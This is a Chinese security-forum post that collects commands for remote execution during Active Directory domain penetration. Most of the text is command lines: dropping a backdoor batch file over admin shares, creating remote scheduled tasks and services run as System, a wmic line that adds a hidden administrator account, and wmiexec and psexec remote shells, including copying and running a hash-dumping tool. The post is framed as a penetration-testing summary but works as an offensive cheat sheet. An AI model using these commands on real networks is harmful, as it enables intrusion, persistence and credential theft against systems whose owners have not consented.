安全矩阵

 找回密码
 立即注册
搜索
查看: 6592|回复: 0

内网渗透之域渗透命令执行总结

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-1-19 23:23:35 | 显示全部楼层 |阅读模式
原文链接:内网渗透之域渗透命令执行总结

前言
AD的全称是Active Directory:活动目录
域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。
在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服务选择对应的方式进行命令执行。本文对ad域渗透中常见的命令执行方式进行一个总结。
ipc前提
开启ipc共享
配置本地安全策略:开始->运行-> secpol.msc->本地策略->安全选项->网络访问:共享>和本地帐户的安全模型>经典-本地用户进行身份验证
配置本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略
——安全选项——用户账户控制:以管理员批准模式运行所有管理员——禁用。
文件共享
  1. 写入后门文件
  2. net use z: \\目标IP\c$ "passwd" /user:"admin"

  3. copy hack.bat \\目标ip\c$
  4. #删除连接
  5. net use \\目标IP\ipc$ /del
复制代码


后续使用下面的方式执行
at(win10不可用)
定时任务执行命令
前提
开启windows Event log服务,开启Task Scheduler服务
其余条件同ipc
命令执行
  1. at \\170.170.64.19 23:00 c:\windows\system32\calc.exe
  2. at \\170.170.64.19 1 delete /yes #删除本机1号任务
复制代码

schtasks

前提
开启windows Event log服务,开启Task Scheduler服务
其余条件同ipc
  1. schtasks /create /tn firstTask /tr "c:\windows\system32\cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd
  2. schtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwd
  3. schtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd
复制代码

telnet

前提
开启telnet服务
命令执行
  1. telnet 目标ip
  2. 之后可执行命令
复制代码
sc

  1. windows2003
  2. windows XP
复制代码

命令执行
  1. sc \\170.170.64.19 create testSC binPath= "cmd.exe /c start c:\windows\hack.bat"
  2. sc \\170.170.64.19 start testSC
  3. sc \\170.170.64.19 delete testSC
复制代码

wmic

前提
开启wmi服务,135端口
命令执行
  1. wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"

  2. wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c net user test 123456 /add && net localgroup administrators test /add"
复制代码

wmiexec.vbs(需要安装)

前提
开启wmi服务,135端口
安装
下载vmiexec.vbs
命令执行
  1. cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwd
  2. cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd "cmdkey /list"
  3. cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat
  4. #其他参数
  5. -wait5000 表示这个命令等待5s后再读取结果,用于运行“运行时间长”的命令。
  6. -persist 程序会在后台运行,不会有结果输出,而且会返回这个命令进程的 PID,方便结束进程,用于运行 nc 或者木马程序。
复制代码

impackets wmiexec(需要安装)

前提
开启wmi服务,135端口
安装
  1. git clone https://github.com/SecureAuthCorp/impacket/
  2. pip install -r requirements.txt
  3. pip install impacket
复制代码

命令执行


#获取远程计算机交互式shell
python wmiexec.py admin:passwd@170.170.64.19
psexec(需要安装)

前提
开启admin$共享
安装命令执行
  1. #打开交互式shell
  2. psexec \\170.170.64.19 -u admin -p passwd cmd
  3. #执行单条命令
  4. psexec \\170.170.64.19 -u admin -p passwd -s cmd /c "calc.exe"
  5. #拷贝文件到远程计算机并执行
  6. psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe

  7. #其他参数
  8. –accepteula 第一次运行会弹框,输入这个参数便不会弹框
  9. -s 以 “nt authority\system” 权限运行远程进程
  10. -h 如果可以,以管理员权限运行远程进程
  11. -d 不等待程序执行完就返回,请只对非交互式应用程序使用此选项
  12. \\ip 可以替换成 @ip.txt (存放多个 ip 的文本),可以批量执行命令
复制代码

远程桌面

前提
开启远程桌面,3389端口
命令执行可直接通过mstsc进入目标系统




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-20 21:26 , Processed in 0.014866 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表